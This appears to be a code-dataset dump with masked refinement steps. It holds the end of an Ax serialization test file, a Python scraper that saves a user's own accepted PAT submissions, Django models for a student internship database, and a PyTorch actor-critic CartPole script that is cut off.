need to do\n # this so equality test passes\n with self.assertRaises(RuntimeError):\n converted_object.evaluation_function(parameterization={})\n\n original_object.evaluation_function = None\n converted_object.evaluation_function = None\n\n self.assertEqual(\n original_object,\n converted_object,\n msg=f\"Error encoding/decoding {class_}.\",\n )\n\n def testEncodeDecodeTorchTensor(self):\n x = torch.tensor(\n [[1.0, 2.0], [3.0, 4.0]], dtype=torch.float64, device=torch.device(\"cpu\")\n )\n expected_json = {\n \"__type\": \"Tensor\",\n \"value\": [[1.0, 2.0], [3.0, 4.0]],\n \"dtype\": {\"__type\": \"torch_dtype\", \"value\": \"torch.float64\"},\n \"device\": {\"__type\": \"torch_device\", \"value\": \"cpu\"},\n }\n x_json = object_to_json(x)\n self.assertEqual(expected_json, x_json)\n x2 = object_from_json(x_json)\n self.assertTrue(torch.equal(x, x2))\n\n def testDecodeGenerationStrategy(self):\n generation_strategy = get_generation_strategy()\n experiment = get_branin_experiment()\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertGreater(len(new_generation_strategy._steps), 0)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n # Model has not yet been initialized on this GS since it hasn't generated\n # anything yet.\n self.assertIsNone(new_generation_strategy.model)\n\n # Check that we can encode and decode the generation strategy after\n # it has generated some generator runs. Since we now need to `gen`,\n # we remove the fake callable kwarg we added, since model does not\n # expect it.\n generation_strategy = get_generation_strategy(with_callable_model_kwarg=False)\n gr = generation_strategy.gen(experiment)\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n # Since this GS has now generated one generator run, model should have\n # been initialized and restored when decoding from JSON.\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n # Check that we can encode and decode the generation strategy after\n # it has generated some trials and been updated with some data.\n generation_strategy = new_generation_strategy\n experiment.new_trial(gr) # Add previously generated GR as trial.\n # Make generation strategy aware of the trial's data via `gen`.\n generation_strategy.gen(experiment, data=get_branin_data())\n gs_json = object_to_json(generation_strategy)\n new_generation_strategy = generation_strategy_from_json(gs_json)\n self.assertEqual(generation_strategy, new_generation_strategy)\n self.assertIsInstance(new_generation_strategy._steps[0].model, Models)\n self.assertIsInstance(new_generation_strategy.model, ModelBridge)\n\n def testEncodeDecodeNumpy(self):\n arr = np.array([[1, 2, 3], [4, 5, 6]])\n self.assertTrue(np.array_equal(arr, object_from_json(object_to_json(arr))))\n\n def testEncodeDecodeSimpleBenchmarkProblem(self):\n branin_problem = get_branin_simple_benchmark_problem()\n sum_problem = get_sum_simple_benchmark_problem()\n new_branin_problem = object_from_json(object_to_json(branin_problem))\n new_sum_problem = object_from_json(object_to_json(sum_problem))\n self.assertEqual(\n branin_problem.f(1, 2), new_branin_problem.f(1, 2), branin(1, 2)\n )\n self.assertEqual(sum_problem.f([1, 2]), 
new_sum_problem.f([1, 2]), 3)\n # Test using `from_botorch`.\n ackley_problem = SimpleBenchmarkProblem(\n f=from_botorch(Ackley()), noise_sd=0.0, minimize=True\n )\n new_ackley_problem = object_from_json(object_to_json(ackley_problem))\n self.assertEqual(\n ackley_problem.f(1, 2), new_ackley_problem.f(1, 2), ackley(1, 2)\n )\n\n def testRegistryAdditions(self):\n class MyRunner(Runner):\n def run():\n pass\n\n def staging_required():\n return False\n\n class MyMetric(Metric):\n pass\n\n register_metric(MyMetric)\n register_runner(MyRunner)\n\n experiment = get_experiment_with_batch_and_single_trial()\n experiment.runner = MyRunner()\n experiment.add_tracking_metric(MyMetric(name=\"my_metric\"))\n with tempfile.NamedTemporaryFile(mode=\"w+\", delete=False, suffix=\".json\") as f:\n save_experiment(experiment, f.name)\n loaded_experiment = load_experiment(f.name)\n self.assertEqual(loaded_experiment, experiment)\n os.remove(f.name)\n\n def testEncodeUnknownClassToDict(self):\n # Cannot encode `UnknownClass` type because it is not registered in the\n # CLASS_ENCODER_REGISTRY.\n class UnknownClass:\n def __init__(self):\n pass\n\n with self.assertRaisesRegex(\n ValueError, \"is a class. Add it to the CLASS_ENCODER_REGISTRY\"\n ):\n object_to_json(UnknownClass)\n # `UnknownClass` type is registered in the CLASS_ENCODER_REGISTRY and uses the\n # `botorch_modular_to_dict` encoder, but `UnknownClass` is not registered in\n # the `botorch_modular_registry.py` file.\n CLASS_ENCODER_REGISTRY[UnknownClass] = botorch_modular_to_dict\n with self.assertRaisesRegex(\n ValueError,\n \"does not have a corresponding parent class in CLASS_TO_REGISTRY\",\n ):\n object_to_json(UnknownClass)\n\n def testDecodeUnknownClassFromJson(self):\n with self.assertRaisesRegex(\n ValueError,\n \"does not have a corresponding entry in CLASS_TO_REVERSE_REGISTRY\",\n ):\n class_from_json({\"index\": 0, \"class\": \"unknown_path\"})\n",
"step-ids": [
7,
10,
12,
14,
18
]
}
|
[
7,
10,
12,
14,
18
] |
from bs4 import BeautifulSoup
import urllib2
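# Scrape a user's PAT submission list on patest.cn and save the source code of
# submissions whose result class is 'submitRes-3' (presumably "accepted").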
def get_begin_data(url):
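    # Fetch one submissions page and walk the results table: consecutive <a>
    # cells yield each submission's link and title, and the classed <span>
    # cells record its judge result under 'answer'.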
headers = {
        'User-Agent': '',
'Cookie': ''
}
request = urllib2.Request(url, headers=headers)
web_data = urllib2.urlopen(request)
soup = BeautifulSoup(web_data, 'html.parser')
results = soup.select('table > tr > td > a')
answers = soup.select('table > tr > td > span')
index = 0
datas = []
for result in results:
if index == 0:
data = {
'link': result.get('href')
}
index += 1
elif index == 1:
data['title'] = result.get_text()
datas.append(data)
index += 1
elif index == 2:
index += 1
else:
index = 0
index = 0
for answer in answers:
if answer.get('class') != None:
datas[index]['answer'] = answer.get('class')
index += 1
return datas
def anly_data(datas):
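    # Keep only submissions whose result class is 'submitRes-3' and build
    # absolute URLs to their '/source' pages.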
linkList = []
for data in datas:
if data['answer'] == [u'submitRes-3']:
link = {
'url':'https://www.patest.cn'+data['link'] + '/source',
'title':data['title']
}
linkList.append(link)
return linkList
def save_file(linkList):
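    # Download each submission's source page and write the '#sourceCode' text
    # to '<title>.cpp'.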
headers = {
        'User-Agent': '',
'Cookie': ''
}
for link in linkList:
request = urllib2.Request(link['url'], headers=headers)
web_data = urllib2.urlopen(request)
soup = BeautifulSoup(web_data, 'html.parser')
code = soup.select('#sourceCode')
file = open(link['title']+'.cpp', 'w')
for i in code:
file.write(i.get_text().encode('utf-8'))
file.close()
if __name__ == '__main__':
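    # Crawl submission pages 1-11, then fetch and save the matching sources.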
datas = []
for page_number in range(1, 12):
url = 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'.format(page_number)
        datas += get_begin_data(url)
linkList = anly_data(datas)
save_file(linkList)
|
normal
|
{
"blob_id": "790110a8cba960eb19593e816b579080dfc46a4e",
"index": 4572,
"step-1": "<mask token>\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\n<mask token>\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\ndef anly_data(datas):\n linkList = []\n for data in datas:\n if data['answer'] == [u'submitRes-3']:\n link = {'url': 'https://www.patest.cn' + data['link'] +\n '/source', 'title': data['title']}\n linkList.append(link)\n return linkList\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\ndef anly_data(datas):\n linkList = []\n for data in datas:\n if data['answer'] == [u'submitRes-3']:\n link = {'url': 'https://www.patest.cn' + data['link'] +\n '/source', 'title': data['title']}\n linkList.append(link)\n return linkList\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\nif __name__ == '__main__':\n datas = []\n for page_number in range(1, 12):\n url = (\n 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'\n .format(page_number))\n datas = get_begin_data(url)\n linkList = anly_data(datas)\n save_file(linkList)\n",
"step-4": "from bs4 import BeautifulSoup\nimport urllib2\n\n\ndef get_begin_data(url):\n headers = {'ser-Agent': '', 'Cookie': ''}\n request = urllib2.Request(url, headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n results = soup.select('table > tr > td > a')\n answers = soup.select('table > tr > td > span')\n index = 0\n datas = []\n for result in results:\n if index == 0:\n data = {'link': result.get('href')}\n index += 1\n elif index == 1:\n data['title'] = result.get_text()\n datas.append(data)\n index += 1\n elif index == 2:\n index += 1\n else:\n index = 0\n index = 0\n for answer in answers:\n if answer.get('class') != None:\n datas[index]['answer'] = answer.get('class')\n index += 1\n return datas\n\n\ndef anly_data(datas):\n linkList = []\n for data in datas:\n if data['answer'] == [u'submitRes-3']:\n link = {'url': 'https://www.patest.cn' + data['link'] +\n '/source', 'title': data['title']}\n linkList.append(link)\n return linkList\n\n\ndef save_file(linkList):\n headers = {'ser-Agent': '', 'Cookie': ''}\n for link in linkList:\n request = urllib2.Request(link['url'], headers=headers)\n web_data = urllib2.urlopen(request)\n soup = BeautifulSoup(web_data, 'html.parser')\n code = soup.select('#sourceCode')\n file = open(link['title'] + '.cpp', 'w')\n for i in code:\n file.write(i.get_text().encode('utf-8'))\n file.close()\n\n\nif __name__ == '__main__':\n datas = []\n for page_number in range(1, 12):\n url = (\n 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'\n .format(page_number))\n datas = get_begin_data(url)\n linkList = anly_data(datas)\n save_file(linkList)\n",
"step-5": "from bs4 import BeautifulSoup\r\nimport urllib2\r\ndef get_begin_data(url):\r\n headers = {\r\n 'ser-Agent': '',\r\n 'Cookie': ''\r\n }\r\n request = urllib2.Request(url, headers=headers)\r\n web_data = urllib2.urlopen(request)\r\n soup = BeautifulSoup(web_data, 'html.parser')\r\n results = soup.select('table > tr > td > a')\r\n answers = soup.select('table > tr > td > span')\r\n index = 0\r\n datas = []\r\n for result in results:\r\n if index == 0:\r\n data = {\r\n 'link': result.get('href')\r\n }\r\n index += 1\r\n elif index == 1:\r\n data['title'] = result.get_text()\r\n datas.append(data)\r\n index += 1\r\n elif index == 2:\r\n index += 1\r\n else:\r\n index = 0\r\n index = 0\r\n for answer in answers:\r\n if answer.get('class') != None:\r\n datas[index]['answer'] = answer.get('class')\r\n index += 1\r\n return datas\r\ndef anly_data(datas):\r\n linkList = []\r\n for data in datas:\r\n if data['answer'] == [u'submitRes-3']:\r\n link = {\r\n 'url':'https://www.patest.cn'+data['link'] + '/source',\r\n 'title':data['title']\r\n }\r\n linkList.append(link)\r\n return linkList\r\ndef save_file(linkList):\r\n headers = {\r\n 'ser-Agent': '',\r\n 'Cookie': ''\r\n }\r\n for link in linkList:\r\n request = urllib2.Request(link['url'], headers=headers)\r\n web_data = urllib2.urlopen(request)\r\n soup = BeautifulSoup(web_data, 'html.parser')\r\n code = soup.select('#sourceCode')\r\n file = open(link['title']+'.cpp', 'w')\r\n for i in code:\r\n file.write(i.get_text().encode('utf-8'))\r\n file.close()\r\nif __name__ == '__main__':\r\n datas = []\r\n for page_number in range(1, 12):\r\n url = 'https://www.patest.cn/contests/pat-b-practise/submissions?page={}&self=true'.format(page_number)\r\n datas = get_begin_data(url)\r\n linkList = anly_data(datas)\r\n save_file(linkList)\r\n\r\n\r\n\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from django.db import models
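# Unmanaged models (managed = False) mapped onto pre-existing tables of a
# college/internship database; Django will not create or migrate them.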
class faculdades(models.Model):
    codigo = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
cidade = models.CharField(max_length=30)
estado = models.CharField(max_length=20)
pais = models.CharField(max_length=20)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
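# A course belongs to one department and one college.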
class cursos(models.Model):
    codigo = models.AutoField(primary_key=True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
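# Professors attached to a course; referenced below as internship supervisors.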
class profcoorest(models.Model):
    masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
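# Students, with their current term ('periodo') and course.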
class alunos(models.Model):
    matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
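# An internship: links a student to a supervising professor and records pay,
# employer, workload hours and a description.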
class estagio(models.Model):
    codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
        return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
|
normal
|
{
"blob_id": "20e5220ce23aaaedbfafe599b352f5d3a220e82e",
"index": 6687,
"step-1": "<mask token>\n\n\nclass cursos(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-2": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-3": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-4": "from django.db import models\n\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-5": "from django.db import models\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key = True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key = True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n \n def __str__(self):\n return '%s' % (self.codigo)\n \n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'",
"step-ids": [
11,
13,
14,
16,
17
]
}
|
[
11,
13,
14,
16,
17
] |
import torch.nn as nn
import torch
from torch.distributions.categorical import Categorical
import torch.nn.functional as F
from torch.optim import Adam
import gym
import numpy as np
Device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class ActorCriticNet(nn.Module):
def __init__(self, observation_space, action_space,
hidden_sizes=[32,32], activation=nn.Tanh):
super().__init__()
obs_dim = observation_space.shape[0]
action_dim = action_space.n
self.base_net = nn.Sequential(
nn.Linear(obs_dim, hidden_sizes[0]),
# nn.Linear(hidden_sizes[0], hidden_sizes[1]),
)
        # base_net outputs hidden_sizes[0] features (the second linear is commented out above)
        self.pi = nn.Linear(hidden_sizes[0], action_dim)
        self.vf = nn.Linear(hidden_sizes[0], 1)
self.to(Device)
def forward(self, obs):
obs = torch.Tensor(obs).to(Device)
x = F.relu(self.base_net(obs))
action_logits = F.softmax(self.pi(x), dim=-1)
value = self.vf(x)
return action_logits, value
class Agent(object):
def __init__(self, model=None, lr=1e-2, gamma=0.99):
self.gamma = gamma
self.AC = model
        self.optimizer = Adam(self.AC.parameters(), lr=lr)
self.logp_as = []
self.values = []
self.rewards = []
def choose_action(self, obs):
action_logits, value = self.AC(obs)
distribution = Categorical(action_logits)
action = distribution.sample()
self.logp_as.append(distribution.log_prob(action))
self.values.append(value)
return action.item()
def learn(self):
R = 0
policy_losses = []
value_losses = []
returns = []
for r in self.rewards[::-1]:
R = r + self.gamma * R
returns.insert(0, R)
returns = torch.tensor(returns).to(Device)
returns = (returns - returns.mean()) / (returns.std() + 0.00001)
for logp_a, value, R in zip(self.logp_as, self.values, returns):
advantage = R - value.item()
# calculate actor (policy) loss
policy_losses.append(-logp_a * advantage)
# calculate critic (value) loss using L1 smooth loss
value_losses.append(F.smooth_l1_loss(value, torch.tensor([R]).to(Device)))
self.optimizer.zero_grad()
loss = torch.stack(policy_losses).sum() + torch.stack(value_losses).sum()
loss.backward(retain_graph=True)
self.optimizer.step()
self.rewards = []
self.values = []
self.logp_as = []
# Build env
env = gym.make('CartPole-v1')
state = env.reset()
# Learning setting
lr = 3e-2
EPISODES=30000
GAMMA = 0.99
hidden_sizes = [128,128]
show_every = 100
AC = ActorCriticNet(env.observation_space, env.action_space, hidden_sizes)
agent = Agent(AC, lr=lr, gamma=GAMMA)
running_reward = 0
for episode in range(EPISODES):
# For every episode init
done = False
obs = env.reset()
I = 1
T = 0
    # Logs
    episode_reward = 0
if episode % show_every == 0:
is_render = True
else:
is_render = False
while not done:
# Render
if is_render:
env.render("human")
# Predict action and value
action = agent.choose_action(obs)
# Step the env
next_obs, reward, done, _ = env.step(action)
# Update obs
obs = next_obs
agent.rewards.append(reward)
T += 1
# Logs
episode_reward += reward
# Learn once
agent.learn()
# Update cumulative reward
running_reward = 0.05 * episode_reward + (1 - 0.05) * running_reward
print(f"episode_{episode} \t ep_reward = {episode_reward} \t ep_len = {T}")
if running_reward > env.spec.reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(running_reward, T))
break
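
A minimal evaluation sketch for the policy trained above, reusing the same env and agent objects; acting greedily via argmax instead of sampling is an assumption about deployment, not taken from the record:

obs = env.reset()
done = False
eval_return = 0.0
while not done:
    with torch.no_grad():
        action_probs, _ = agent.AC(obs)  # forward pass only; no gradient bookkeeping
    obs, reward, done, _ = env.step(action_probs.argmax().item())
    eval_return += reward
print(f"greedy evaluation return = {eval_return}")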
|
normal
|
{
"blob_id": "e1ab4b034c949b8158c6ccc1e8e3f4a960a38c72",
"index": 4382,
